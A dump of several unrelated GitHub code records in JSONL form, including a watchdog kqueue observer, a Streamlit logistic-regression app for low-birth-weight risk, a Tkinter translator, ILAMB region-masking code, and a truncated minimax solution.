files_renamed.add(src_path)\r\n\r\n return (files_renamed, dirs_renamed, dirs_modified)\r\n\r\n def _queue_renamed(self, src_path, is_directory, ref_snapshot, new_snapshot):\r\n try:\r\n ref_stat_info = ref_snapshot.stat_info(src_path)\r\n except KeyError:\r\n if is_directory:\r\n self.queue_event(DirCreatedEvent(src_path))\r\n self.queue_event(DirDeletedEvent(src_path))\r\n else:\r\n self.queue_event(FileCreatedEvent(src_path))\r\n self.queue_event(FileDeletedEvent(src_path))\r\n return\r\n\r\n try:\r\n dest_path = absolute_path(new_snapshot.path_for_inode(ref_stat_info.st_ino))\r\n if is_directory:\r\n event = DirMovedEvent(src_path, dest_path)\r\n if self.watch.is_recursive:\r\n for sub_event in event.sub_moved_events():\r\n self.queue_event(sub_event)\r\n\r\n self.queue_event(event)\r\n else:\r\n self.queue_event(FileMovedEvent(src_path, dest_path))\r\n except KeyError:\r\n if is_directory:\r\n self.queue_event(DirDeletedEvent(src_path))\r\n else:\r\n self.queue_event(FileDeletedEvent(src_path))\r\n\r\n def _read_events(self, timeout = None):\r\n return self._kq.control(self._descriptors.kevents, MAX_EVENTS, timeout)\r\n\r\n def queue_events(self, timeout):\r\n with self._lock:\r\n try:\r\n event_list = self._read_events(timeout)\r\n files_renamed, dirs_renamed, dirs_modified = self._queue_events_except_renames_and_dir_modifications(event_list)\r\n new_snapshot = DirectorySnapshot(self.watch.path, self.watch.is_recursive)\r\n ref_snapshot = self._snapshot\r\n self._snapshot = new_snapshot\r\n if files_renamed or dirs_renamed or dirs_modified:\r\n for src_path in files_renamed:\r\n self._queue_renamed(src_path, False, ref_snapshot, new_snapshot)\r\n\r\n for src_path in dirs_renamed:\r\n self._queue_renamed(src_path, True, ref_snapshot, new_snapshot)\r\n\r\n self._queue_dirs_modified(dirs_modified, ref_snapshot, new_snapshot)\r\n except OSError as e:\r\n if e.errno == errno.EBADF:\r\n pass\r\n else:\r\n raise\r\n\r\n def on_thread_stop(self):\r\n with self._lock:\r\n self._descriptors.clear()\r\n self._kq.close()\r\n\r\n\r\nclass KqueueObserver(BaseObserver):\r\n\r\n def __init__(self, timeout = DEFAULT_OBSERVER_TIMEOUT):\r\n BaseObserver.__init__(self, emitter_class=KqueueEmitter, timeout=timeout)\r\n","repo_name":"connoryang/dec-eve-serenity","sub_path":"client/watchdog/observers/kqueue.py","file_name":"kqueue.py","file_ext":"py","file_size_in_byte":10973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20135861784","text":"from problem_utils import *\nfrom operator import *\n\nclass LCMRange:\n def lcm(self, first, last):\n input_int0 = first\n input_int1 = last\n inf = 1000\n \n # The least common multiple of a group of integers is the smallest number that can be evenly divided by all the integers in the group.\n #### least_common_multiple = lambda group: smallest(integers for integers in group) for number in range(1, inf) if all(evenly(divided(number, integers), 0))\n reduce = lambda possibility: min(i for i in range(1, inf) if all(eq(mod(i, element), 0) for element in possibility))\n \n # Given two ints, first and last, find the least common multiple of all the numbers between first and last, inclusive.\n #### find(least_common_multiple(between(first, inclusive(last))))\n return(reduce(range(input_int0, inclusive(input_int1))))\n \nif __name__ == '__main__':\n first, last = 1,5\n lcmr = LCMRange()\n print(lcmr.lcm(first, last))","repo_name":"jvalansi/word2code","sub_path":"word2code/res/text&code3/LCMRange.py","file_name":"LCMRange.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"950421416","text":"import pandas as pd\nimport numpy as np \nimport os\nimport statsmodels.api as sm\nimport scipy.stats as stats\nimport math\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom scipy.special import logit\nimport streamlit as st \nimport sklearn.metrics as metrics\n\n\ndef load_df(path,**kwargs):\n \n with open(path,'r',**kwargs) as file:\n \n result = pd.read_csv(file, sep='\\s+')\n\n return result\n\ndef data_transform(df):\n \n df_temp1 = df.rename(columns = {'4':'ID','1':'LOW','28':'AGE',\n '120':'LWT','3':'RACE',\n '1.1':'SMOKE','1.2':'PTL','0':'HT','1.3':'UI',\n '0.1':'FTV','709':'BWT'})\n \n dummies_race = pd.get_dummies(df_temp1[\"RACE\"],prefix = ['RACE'],drop_first = True)\n \n df_temp2 = pd.concat([df_temp1,dummies_race],axis = 1)\n \n \n \n df_temp3 = df_temp2.drop([\"RACE\"],axis = 1)\n \n real_df = df_temp3.rename(columns = {\"['RACE']_2\":\"RACE_2\",\"['RACE']_3\":\"RACE_3\"})\n \n return real_df\n\n\ndef odds_ratio(df,column1,column2):\n\n \n table = df.groupby(\"LOW\").sum()[[column1,column2]].values\n odds,p_value = stats.fisher_exact(table)\n \n return {\"Odds Ratio\": round(odds,2), \"P-Valor\": round(p_value,2)}\n \n \ndef stepwise_selection(X, y,initial_list=[],pvalue_in=0.15,pvalue_out = 0.20,verbose=True):\n included = list(initial_list)\n while True:\n changed=False\n # forward step\n excluded = list(set(X.columns)-set(included))\n new_pval = pd.Series(index=excluded)\n for new_column in excluded:\n model = sm.OLS(y, sm.add_constant(pd.DataFrame(X[included+[new_column]]))).fit()\n new_pval[new_column] = model.pvalues[new_column]\n best_pval = new_pval.min()\n if best_pval < pvalue_in:\n best_feature = new_pval.argmin()\n included.append(best_feature)\n \n changed=True\n \n if verbose:\n \n print(f'Adicionando {best_feature} com p-valor {best_pval}')\n\n # backward step\n model = sm.OLS(y, sm.add_constant(pd.DataFrame(X[included]))).fit()\n # use all coefs except intercept\n pvalues = model.pvalues.iloc[1:]\n worst_pval = pvalues.max() # null if pvalues is empty\n if worst_pval > pvalue_out:\n changed=True\n worst_feature = pvalues.argmax()\n included.remove(worst_feature)\n if verbose:\n \n print(f'Removendo {worst_feature} with p-value {worst_pval}')\n if not changed:\n break\n return included\n \n\ndef model(Y,*args):\n \n dependente = Y\n independentes = sm.add_constant(*args)\n \n logit_mod = sm.Logit(dependente,independentes)\n result = logit_mod.fit(method = 'newton')\n return result \n \ndef wald_test(list_coef,list_se):\n \n values = []\n for i,j in zip(list_coef,list_se):\n test = round(abs(i / j),2)\n values.append(test)\n pvalor = 1 - stats.norm.cdf(values,0,1)\n \n for index, pvalues in enumerate(pvalor):\n \n if pvalues < 0.05:\n \n \n print (f'Rejeitamos H0 E Concluimos queo coeficiente Beta {index+1} , com W = {values[index]} tem significância, com um p-valor de {round(pvalues,6)}.\\n')\n \n elif pvalues > 0.05:\n \n print(f'Não Rejeitamos H0 E Concluimos que o coeficiente Beta {index+1}, com W = {values[index]} não significância, com um p-valor de {round(pvalues,6)}.\\n')\n \n \ndef hosmer_lemeshow_test(df,groups):\n \n data_st = df.sort_values('predict')\n data_st['dcl'] = pd.qcut(data_st['predict'],groups)\n \n ys = data_st['LOW'].groupby(data_st.dcl).sum()\n yt = data['LOW'].groupby(data_st.dcl).count()\n yn = yt - ys\n \n yps = data_st['predict'].groupby(data_st.dcl).sum()\n ypt = data_st['predict'].groupby(data_st.dcl).count()\n ypn = ypt - yps\n \n hltest = ( ((ys - yps)**2 / yps) + ((yn - ypn)**2 / ypn) ).sum()\n pvalor = 1 - stats.chi2.cdf(hltest,groups-2)\n \n df = groups - 2\n print(f'O teste de Hosmer-Lemeshow: {hltest}, com p-valor: {pvalor} com {df} graus de liberdade')\n \ndef plot_probability(df):\n \n sns.regplot(x = df['LWT'].values,y = df['LOW'],\n logistic=True, color = 'blue')\n plt.xlabel('Hand Weight in the Last Menstrual Period')\n plt.ylabel('Probability')\n plt.title('Logistic Regression:Probability of a baby being born with low weight')\n plt.grid()\n plt.show()\n \ndef confusion_matrix_plot(model):\n \n sns.heatmap(model.pred_table())\n plt.title(\"Confusion Matrix\") \n plt.show()\n \n \ndef plot_logit(model,df):\n \n variables = pd.DataFrame(df,columns = ['LWT', 'SMOKE', 'PTL', 'HT', 'UI','RACE_2','RACE_3']) \n X = sm.add_constant(variables)\n predict = model.predict(X)\n logit_g = logit(predict)\n \n sns.regplot(x = variables['LWT'].values,y = logit_g,color = '0.1') \n plt.xlabel('Hand Weight in the Last Menstrual Period')\n plt.ylabel('Logit')\n plt.title('Logit of a baby being born with low weight')\n plt.grid()\n plt.show() \n \ndef residual_pearson(model,df):\n \n observed = []\n \n m = np.asarray(df.groupby(['LWT','LOW'])['LOW'].count().values)\n yi = df.groupby(['LWT','LOW']).groups.keys()\n predict = model.predict()\n r = np.ones((len(m)))\n\n \n for i,j in yi:\n observed.append(j)\n \n obs_2 = np.asarray(observed)\n \n for k in range(len(m)):\n \n r[k] = (obs_2[k] - (m[k] * predict[k]))/math.sqrt(m[k] * predict[k] * (1 - predict[k]))\n \n Chi_2 = np.round(np.sum(r**2),2)\n \n chi_tab = stats.chi2.ppf(1 - .05,df = len(m) - model.df_model + 1)\n p_valor = 1 - stats.chi2.cdf(Chi_2,len(m) - model.df_model + 1)\n\n print(f'Como a estatística qui-quadrado {Chi_2}, valor tabelado {round(chi_tab,2)} e o seu p-valor é {round(p_valor,7)}')\n \ndef roc_curve(model,df):\n \n variables = pd.DataFrame(df,columns = ['LWT', 'SMOKE', 'PTL', 'HT', 'UI','RACE_2','RACE_3']) \n X = sm.add_constant(variables)\n probs = model.predict(X)\n fpr,tpr,threshold = metrics.roc_curve(y,probs) \n roc_auc = metrics.auc(fpr,tpr)\n\n \n \n plt.title(\"Curva Roc\")\n plt.plot(fpr,tpr,'b',label = 'AUC = %0.2f' % roc_auc)\n plt.legend(loc = 'lower right')\n plt.plot([0,1],[0,1],'r--')\n plt.xlim([0,1])\n plt.ylim([0,1])\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.show()\n \n\n\nst.title('Identificando fatores de riscos associados ao nascimento de bebês com baixo peso.')\nst.text('O objetivo deste projeto é identificar os fatores de riscos que levam um bebê a nascer com baixo peso (menos que 2500 gramas). Este modelo foi construido a partir do modelo de regressão logistica. \\n'\n 'Nesse estudo foram coletados dados de 189 mulheres, em que n1 = 59 tiveram bebês que nasceram com baixo peso e n0 = 130, mulheres que tiveram bebês com peso normal.\\n\\n'\n \n 'Os dados foram coletados no Hospital “Baystate Medical Center” de Springfield, Massachusetts, Estados Unidos, no ano de 1986. No modelo construído sete variáveis foram consideradas importantes, \\n'\n 'como peso da mãe (LWT), raça (RACE), se fumou durante a gravidez (SMOKE), se tem histórico de trabalho de parto prematuro (PTL), se tem hipertensão (HT), se a mâe tem irritabilidade uterina (UI). \\n'\n 'Das variaveis mencionadas, apenas as variáveis trabalho de parto e hipertensão não foram significativas, porém, de acordo com referências pesquisadas, elas são importantes. A variável resposta considerada foi a variável LOW, \\n'\n 'baixo peso do bebê.')\n\n\nbase_path = os.path.dirname(os.path.abspath(__file__))\n\n#Importando dados\ndf = load_df(os.path.join(base_path,\"lowbwt.dat\"))\n\n \n\n#Dados Transformados\ndata = data_transform(df)\n\nst.subheader('Dados:')\nst.write(data.head())\n \n#Verificando se há valores ausentes\n#data.info()\n#data.isnull().sum()\n \n# Teste Odds Ratio com Raça 1 e Raça 2\nodds_ratio(data,\"RACE_2\",\"RACE_3\") \n \n#-------------------------------\n\n\n\nX = pd.DataFrame(data, columns=['AGE', 'LWT', 'SMOKE', 'PTL', 'HT', 'UI', 'FTV', 'RACE_2', 'RACE_3'])\ny = data[\"LOW\"].values\n\nstepwise_selection(X,y)\n \n#Modelo com as Váriaveis selecionadas:\ndependent_variable = data[\"LOW\"].values\nselected_variables = pd.DataFrame(data,columns = ['LWT', 'SMOKE', 'PTL', 'HT', 'UI','RACE_2','RACE_3'])\n \nmodelo = model(dependent_variable,selected_variables)\n\n#Teste Hosmer_Lemeshow: \ndata[\"predict\"] = modelo.predict()\nhosmer_lemeshow_test(data,10)\n\nlist_coef = []\n \nfor index,params in enumerate(modelo.params):\n \n if index > 0:\n list_coef.append(params)\n \nlist_se = np.sqrt([modelo.cov_params()['LWT']['LWT'],\n modelo.cov_params()['SMOKE']['SMOKE'],\n modelo.cov_params()['PTL']['PTL'],\n modelo.cov_params()['HT']['HT'],\n modelo.cov_params()['UI']['UI'],\n modelo.cov_params()['RACE_2']['RACE_2'],\n modelo.cov_params()['RACE_3']['RACE_3'] \n ]) \n \n \n#Teste de Wald\nwald_test(list_coef,list_se)\n \n#Probaility\nst.subheader('Modelo Encontrado: \\n')\nst.latex(r'''\\hat \\pi_i = {e^{-0.0306152 - 0.016050LWT + 0.908519SMOKE + 0.489231PTL + 1.856358HT + 0.747161UI + 1.314579RACE2 + 0.860976RACE3}\\over 1 + e^{-0.0306152 - 0.016050LWT + 0.908519SMOKE + 0.489231PTL + 1.856358HT + 0.747161UI + 1.314579RACE2 + 0.860976RACE3}} ''')\n\n\nst.subheader('Gráfico da Probabilidade Estimada:')\nst.pyplot(plot_probability(data))\n\n \n \nst.subheader('Matriz de Confusão:')\nst.pyplot(confusion_matrix_plot(modelo))\n\n\nst.subheader('Logito Encontrado:')\nst.latex(r'''\\hat g(x_i) = -0.0306152 - 0.016050LWT + 0.908519SMOKE + 0.489231PTL + 1.856358HT + 0.747161UI + 1.314579RACE2 + 0.860976RACE3''')\n#Intervalo de Confiança\nst.subheader('Gráfico do Logito Estimado:')\nst.pyplot(plot_logit(modelo,data))\n \n \n \n#Residuo de Pearson:\nresidual_pearson(modelo,data) \n\n\n#Curva Roc:\nst.subheader('Curva ROC:')\nst.pyplot(roc_curve(modelo,data))\n\n#Texto:\nst.text('Este aplicativo foi um trabalho final da disciplina de Análise de Dados: Regressão Logística.\\nOs dados foram obtidos no livro de HOSMER,D.; LEMESHOW, S. Applied logistic regression. 2nd ed. New York: Wiley, 2000. 375 p.')\n\n#Streamlit\nst.sidebar.header(\"Predição\")\nName = st.sidebar.text_input(\"Digite o seu nome: \")\nLWT = st.sidebar.slider(\"Selecione o seu peso do ultimo periodo menstrual em libras\",1,200,1)\nSMOKE = st.sidebar.selectbox(\"Você fuma ?\",options = ['Sim','Não'])\nPTL = st.sidebar.selectbox(\"Você tem histórico de trabalho de parto prematuro ?\", options = ['Sim','Não'])\nHT = st.sidebar.selectbox('Você tem hipertensão ?', options = [\"Sim\",'Não'])\nUI = st.sidebar.selectbox(\"Você tem irritabilidade uterina ?\",options = ['Sim','Não'])\nRACE = st.sidebar.selectbox(\"Selecione a sua raça:\",options = [\"Branca\",'Negra','Outra'])\n\nb_race,o_race = 0,0\n \nif PTL == 'Sim':\n PTL = 1\n \nelse: \n PTL = 0\n \n \nif HT == 'Sim':\n HT = 1\n \nelse:\n HT = 0\n \n \nif b_race == 'Negra':\n b_race = 1\n \nelif o_race == \"Outra\":\n o_race = 1\n \nelse:\n b_race,o_race = 0,0\n \nif UI == \"Sim\":\n \n UI = 1\n \nelse:\n UI = 0 \n \nif SMOKE == 'Sim':\n \n SMOKE = 1\n\nelse:\n \n SMOKE = 0 \n \nif st.sidebar.button(\"Predizer\"):\n \n input_data = np.asarray([LWT,SMOKE,PTL,HT,UI,b_race,o_race]).reshape((1,7))\n details = np.c_[np.ones((1,1)),input_data] \n result = modelo.predict(sm.add_constant(details)) \n st.sidebar.subheader('A {} tem {}% de chance de seu filho nascer com baixo peso'.format(Name, np.round(result*100 , 2))) \n \n#streamlit run proj.py\n\n\n\n\n\n\n","repo_name":"isaalvesdev/App_LogisticRegression","sub_path":"proj.py","file_name":"proj.py","file_ext":"py","file_size_in_byte":11977,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21953978896","text":"#!/usr/bin/env python\r\nfrom translate import Translator\r\nfrom tkinter import StringVar, Label, ttk, Button, Entry\r\nimport tkinter as tk\r\n\r\nmainWindow = tk.Tk()\r\nmainWindow.title(\"Multi Language Translator\")\r\n\r\ndef eng_to_other_language_translation(selected_lang, input_str):\r\n translator = Translator(to_lang=selected_lang)\r\n translation_str = translator.translate(input_str)\r\n return translation_str\r\n\r\noutput_str = StringVar()\r\ninfo_label = Label(mainWindow, text=\"Enter message here:\")\r\ninfo_label.pack()\r\ninfo_label.config(pady=15)\r\n\r\ninput_entry = Entry(mainWindow,\r\n relief=\"raised\",\r\n bd=2,\r\n font=(\"Arial\", 15))\r\ninput_entry.pack(fill=\"x\", padx=15, pady=10)\r\n\r\ndef translate_handler():\r\n lang = selected_lang.get()\r\n input_str = input_entry.get()\r\n output_str.set(eng_to_other_language_translation(lang, input_str))\r\n\r\n\r\nselected_lang = StringVar()\r\nlang_cb = ttk.Combobox(mainWindow, textvariable=selected_lang)\r\nlang_cb['state'] = 'readonly'\r\nlanguages = ['Gujarati', 'Hindi', 'German', 'Spanish', 'Chinese']\r\nlang_cb['values'] = [m for m in languages]\r\nlang_cb.set('Gujarati')\r\nlang_cb.pack()\r\n\r\ntranslate_btn = Button(mainWindow, text=\"Translate\", command=translate_handler)\r\ntranslate_btn.config(padx=43, pady=10)\r\ntranslate_btn.pack(pady=10)\r\n\r\noutput_label = Label(mainWindow, textvariable=output_str)\r\noutput_label.pack(fill=\"x\", padx=20, pady=10)\r\noutput_label.config(relief=\"raised\", bd=\"2\", height=6, font=(\"Arial\", 24))\r\n\r\nmainWindow.geometry(\"800x450\")\r\nmainWindow.resizable(False, False)\r\nmainWindow.mainloop()","repo_name":"DCDJunkie/tkinter","sub_path":"Applications/6. mult_language_translation.py","file_name":"6. mult_language_translation.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39255849257","text":"import logging\nimport os\nimport warnings\n\nimport numpy as np\nfrom mpi4py import MPI\nfrom netCDF4 import Dataset\n\nlogger = logging.getLogger(\"%i\" % MPI.COMM_WORLD.rank)\n\n\nclass Regions(object):\n \"\"\"A class for unifying the treatment of regions in ILAMB.\n\n This class holds a list of all regions currently registered in the\n ILAMB system via a static property of the class. It also comes\n with methods for defining additional regions by lat/lon bounds or\n by a mask specified by a netCDF4 file. A set of regions used in\n the Global Fire Emissions Database (GFED) is included by default.\n\n \"\"\"\n\n _regions = {}\n _sources = {}\n\n @property\n def regions(self):\n \"\"\"Returns a list of region identifiers.\"\"\"\n return Regions._regions.keys()\n\n def addRegionLatLonBounds(\n self, label, name, lats, lons, source=\"user-provided latlon bounds\"\n ):\n \"\"\"Add a region by lat/lon bounds.\n\n Parameters\n ----------\n label : str\n the unique region identifier (lower case, no spaces or special characters)\n name : str\n the name of the region (as will appear in the HTML pull down menu)\n lats : array-like of size 2\n the minimum and maximum latitudes defining the region on the interval (-90,90)\n lons : array-like of size 2\n the minimum and maximum longitudes defining the region on the interval (-180,180)\n source : str, optional\n a string representing the source of the region, purely cosmetic\n \"\"\"\n lat = np.hstack([[-90.0], np.asarray(lats), [90.0]])\n lon = np.hstack([[-180.0], np.asarray(lons), [180.0]])\n mask = np.asarray([[1, 1, 1], [1, 0, 1], [1, 1, 1]], dtype=bool)\n Regions._regions[label] = [name, lat, lon, mask]\n Regions._sources[label] = source\n\n def addRegionShapeFile(self, filename):\n \"\"\"Add regions found in a Shapefile.\n\n This routine will read region gemoetries from a Shapefile and\n create ILAMB regions. Shapefiles provided can be in any\n geospatial projection, however, they will all be projected to\n standard EPSG 4326 latlon projection. Routine expects the\n shapefile to provide 'label' attribute to populate attribute\n 'labels' for the region.\n\n \"\"\"\n warnings.filterwarnings(\"ignore\")\n try:\n import geopandas as gpd\n except ImportError:\n msg = \"ILAMB Regions based on shapefiles requires the rasterio and geopandas modules\"\n raise ValueError(msg)\n vregions = gpd.read_file(filename)\n # check projection of the shapefile, if not EPSG 4326, reproject to 4326\n if vregions.crs != 4326:\n logger.info(\n \"[Regions.addRegionShapeFile()] Reprojected %s from EPSG %d to EPSG 4326\"\n % (filename, vregions.crs)\n )\n vregions.to_crs(epsg=4326)\n catids = vregions.value.unique().tolist()\n catids.sort()\n regionnames = []\n for c in catids:\n catid = c\n label = vregions.label[vregions.value == c].unique()[0]\n name = label.lower()\n regionnames.append(label.lower())\n shape = vregions[vregions.value == c]\n Regions._regions[label.lower()] = [name, catid, shape]\n Regions._sources[label.lower()] = os.path.basename(filename)\n warnings.filterwarnings(\"default\")\n return regionnames\n\n def addRegionNetCDF4(self, filename):\n \"\"\"Add regions found in a netCDF4 file.\n\n This routine will search the target filename's variables for\n 2-dimensional datasets which contain indices representing\n distinct non-overlapping regions. Each unique non-masked index\n found in this dataset will be added to the global list of\n regions along with a mask representing the region. The names\n of the regions are taken from a required attribute in the\n variable called 'labels'. This attribute should point to a\n variable which is a string array labeling each index found in\n the two-dimensional dataset.\n\n For example, the following header represents a dataset encoded\n to represent 50 of the world's largest river basins. The\n 'basin_index' variable contains integer indices 0 through 49\n where index 0 is labeled by the 0th label found in the 'label'\n variable::\n\n dimensions:\n lat = 360 ;\n lon = 720 ;\n n = 50 ;\n variables:\n string label(n) ;\n label:long_name = \"basin labels\" ;\n float lat(lat) ;\n lat:long_name = \"latitude\" ;\n lat:units = \"degrees_north\" ;\n float lon(lon) ;\n lon:long_name = \"longitude\" ;\n lon:units = \"degrees_east\" ;\n int basin_index(lat, lon) ;\n basin_index:labels = \"label\" ;\n\n Parameters\n ----------\n filename : str\n the full path of the netCDF4 file containing the regions\n\n Returns\n -------\n regions : list of str\n a list of the keys of the regions added.\n \"\"\"\n dset = Dataset(filename)\n\n # look for 2d datasets defined on regular grids\n labels = []\n for var in dset.variables:\n v = dset.variables[var]\n if len(v.dimensions) == 2 and \"labels\" in v.ncattrs():\n lat = dset.variables[v.dimensions[0]][...]\n lon = dset.variables[v.dimensions[1]][...]\n lbl = dset.variables[v.labels][...]\n nam = dset.variables[v.names][...] if \"names\" in v.ncattrs() else lbl\n ids = np.ma.compressed(np.unique(v[...]))\n assert ids.max() < lbl.size\n for i in ids:\n label = lbl[i].lower()\n name = nam[i]\n mask = v[...].data != i\n Regions._regions[label] = [name, lat, lon, mask]\n Regions._sources[label] = os.path.basename(filename)\n labels.append(label)\n return labels\n\n def getRegionName(self, label):\n \"\"\"Given the region label, return the full name.\n\n Parameters\n ----------\n label : str\n the unique region identifier\n\n Returns\n -------\n name : str\n the long name of the region\n \"\"\"\n return Regions._regions[label][0]\n\n def getRegionSource(self, label):\n \"\"\"Given the region label, return the source.\n\n Parameters\n ----------\n label : str\n the unique region identifier\n\n Returns\n -------\n name : str\n the source of the region\n \"\"\"\n return Regions._sources[label]\n\n def getMask(self, label, var):\n \"\"\"Given the region label and a ILAMB.Variable, return a mask appropriate for that variable.\n\n Parameters\n ----------\n label : str\n the unique region identifier\n var : ILAMB.Variable.Variable\n the variable to which we would like to apply a mask\n\n Returns\n -------\n mask : numpy.ndarray\n a boolean array appropriate for masking the input variable data\n \"\"\"\n\n if len(Regions._regions[label]) == 4:\n name, lat, lon, mask = Regions._regions[label]\n if lat.size == 4 and lon.size == 4:\n # if lat/lon bounds, find which bounds we are in\n rows = (\n (var.lat[:, np.newaxis] >= lat[:-1])\n * (var.lat[:, np.newaxis] <= lat[1:])\n ).argmax(axis=1)\n cols = (\n (var.lon[:, np.newaxis] >= lon[:-1])\n * (var.lon[:, np.newaxis] <= lon[1:])\n ).argmax(axis=1)\n else:\n # if more globally defined, nearest neighbor is fine\n rows = (np.abs(lat[:, np.newaxis] - var.lat)).argmin(axis=0)\n cols = (np.abs(lon[:, np.newaxis] - var.lon)).argmin(axis=0)\n if var.ndata:\n return mask[np.ix_(rows, cols)].diagonal()\n return mask[np.ix_(rows, cols)]\n\n if len(Regions._regions[label]) == 3:\n # we are calculating area of a lat/lon projection in this\n # routine. Suppress geopandas warning message\n warnings.filterwarnings(\"ignore\")\n try:\n import rasterio\n from rasterio import features\n except ImportError:\n msg = \"ILAMB Regions based on shapefiles requires the rasterio and geopandas modules\"\n raise ValueError(msg)\n nrows = len(var.lat)\n ncols = len(var.lon)\n res = (var.lat.max() - var.lat.min()) / nrows\n # calculate nominal pixel area for the model var\n marea = res * res / 100\n name, catid, shape = Regions._regions[label]\n transform = rasterio.transform.from_bounds(\n var.lon.min(), var.lat.max(), var.lon.max(), var.lat.min(), ncols, nrows\n )\n # create a generator with shapes to rasterize\n # subset only the polygons >= marea i.e. ignore any polygon smaller than model grid cell\n gshape = list(\n (geom, value)\n for geom, value in zip(\n shape.loc[shape.area >= marea].geometry, shape.value.unique()\n )\n )\n try:\n rregion = features.rasterize(\n shapes=gshape,\n fill=9999,\n out_shape=(nrows, ncols),\n transform=transform,\n )\n except:\n pass\n mask = rregion != catid\n warnings.filterwarnings(\"default\") # toggle warnings back on\n return mask\n\n def getMaskLatLon(self, label, var):\n \"\"\"Given the region label and a ILAMB.Variable, return a mask appropriate for that variable.\n\n Parameters\n ----------\n label : str\n the unique region identifier\n var : ILAMB.Variable.Variable\n the variable to which we would like to apply a mask\n\n Returns\n -------\n mask : numpy.ndarray\n a boolean array appropriate for masking the input variable data\n \"\"\"\n # we are calculating area of a lat/lon projection in this\n # routine. Suppress geopandas warning message\n warnings.filterwarnings(\"ignore\")\n try:\n import rasterio\n from rasterio import features\n except ImportError:\n msg = \"ILAMB Regions based on shapefiles requires the rasterio and geopandas modules\"\n raise ValueError(msg)\n if len(Regions._regions[label]) == 3:\n nrows = len(var.lat)\n ncols = len(var.lon)\n res = (var.lat.max() - var.lat.min()) / nrows\n marea = res * res\n name, catid, shape = Regions._regions[label]\n transform = rasterio.transform.from_bounds(\n var.lon.min(), var.lat.max(), var.lon.max(), var.lat.min(), ncols, nrows\n )\n gshape = list(\n (geom, value)\n for geom, value in zip(\n shape.loc[shape.area >= marea].geometry, shape.value.unique()\n )\n )\n try:\n rregion = features.rasterize(\n shapes=gshape,\n fill=9999,\n out_shape=(nrows, ncols),\n transform=transform,\n )\n except:\n pass\n mask = rregion != catid\n return var.lat, var.lon, mask\n else:\n msg = \"Regions.getMaskLatLon() is only implemented for shapefile-based regions\"\n raise ValueError(msg)\n warnings.filterwarnings(\"default\") # toggle warnings back on\n\n def hasData(self, label, var):\n \"\"\"Checks if the ILAMB.Variable has data on the given region.\n\n Parameters\n ----------\n label : str\n the unique region identifier\n var : ILAMB.Variable.Variable\n the variable to which we would like check for data\n\n Returns\n -------\n hasdata : boolean\n returns True if variable has data on the given region\n \"\"\"\n axes = range(var.data.ndim)\n if var.spatial:\n axes = axes[:-2]\n if var.ndata:\n axes = axes[:-1]\n keep = self.getMask(label, var) == False\n if var.data.mask.size == 1:\n if var.data.mask:\n keep *= 0\n else:\n keep *= (var.data.mask == False).any(axis=tuple(axes))\n if keep.sum() > 0:\n return True\n return False\n\n def setGlobalRegion(self, label: str) -> None:\n \"\"\"Set the default 'global' region to be used in an ILAMB analysis.\n\n Note that the previous region labeled as 'global' will be\n discarded by the system.\n\n Parameters\n ----------\n label\n the label to set as 'global'\n\n \"\"\"\n if label not in Regions._regions:\n raise ValueError(f\"The '{label}' label is not in ILAMB regions.\")\n Regions._regions[\"global\"] = Regions._regions[label]\n\n\nif \"global\" not in Regions().regions:\n # Populate some regions\n r = Regions()\n src = \"ILAMB internal\"\n r.addRegionLatLonBounds(\n \"global\", \"Globe\", (-89.999, 89.999), (-179.999, 179.999), src\n )\n Regions._regions[\"global\"][3][...] = 0.0 # ensure global mask is null\n r.addRegionLatLonBounds(\n \"globe\", \"Global - All\", (-89.999, 89.999), (-179.999, 179.999), src\n )\n Regions._regions[\"globe\"][3][...] = 0.0 # ensure global mask is null\n\n # GFED regions\n src = \"Global Fire Emissions Database (GFED)\"\n r.addRegionLatLonBounds(\n \"bona\", \"Boreal North America\", (49.75, 79.75), (-170.25, -60.25), src\n )\n r.addRegionLatLonBounds(\n \"tena\", \"Temperate North America\", (30.25, 49.75), (-125.25, -66.25), src\n )\n r.addRegionLatLonBounds(\n \"ceam\", \"Central America\", (9.75, 30.25), (-115.25, -80.25), src\n )\n r.addRegionLatLonBounds(\n \"nhsa\",\n \"Northern Hemisphere South America\",\n (0.25, 12.75),\n (-80.25, -50.25),\n src,\n )\n r.addRegionLatLonBounds(\n \"shsa\",\n \"Southern Hemisphere South America\",\n (-59.75, 0.25),\n (-80.25, -33.25),\n src,\n )\n r.addRegionLatLonBounds(\"euro\", \"Europe\", (35.25, 70.25), (-10.25, 30.25), src)\n r.addRegionLatLonBounds(\"mide\", \"Middle East\", (20.25, 40.25), (-10.25, 60.25), src)\n r.addRegionLatLonBounds(\n \"nhaf\", \"Northern Hemisphere Africa\", (0.25, 20.25), (-20.25, 45.25), src\n )\n r.addRegionLatLonBounds(\n \"shaf\", \"Southern Hemisphere Africa\", (-34.75, 0.25), (10.25, 45.25), src\n )\n r.addRegionLatLonBounds(\"boas\", \"Boreal Asia\", (54.75, 70.25), (30.25, 179.75), src)\n r.addRegionLatLonBounds(\n \"ceas\", \"Central Asia\", (30.25, 54.75), (30.25, 142.58), src\n )\n r.addRegionLatLonBounds(\n \"seas\", \"Southeast Asia\", (5.25, 30.25), (65.25, 120.25), src\n )\n r.addRegionLatLonBounds(\n \"eqas\", \"Equatorial Asia\", (-10.25, 10.25), (99.75, 150.25), src\n )\n r.addRegionLatLonBounds(\n \"aust\", \"Australia\", (-41.25, -10.50), (112.00, 154.00), src\n )\n","repo_name":"rubisco-sfa/ILAMB","sub_path":"src/ILAMB/Regions.py","file_name":"Regions.py","file_ext":"py","file_size_in_byte":15692,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"52"} +{"seq_id":"13098073885","text":"\ndef solution(arr):\n MIN, MAX = 0, 1\n arr = tuple(arr)\n\n record = {}\n def dfs(arr, target):\n if (arr, target) in record:\n return record[(arr, target)]\n if len(arr) == 1:\n return int(arr[0])\n\n best_v = -float('inf') if target == MAX else float('inf')\n\n for i in range(1, len(arr), 2):\n if arr[i] == '+':\n if target == MAX:\n best_v = max(best_v, dfs(arr[:i], MAX) + dfs(arr[i + 1:], 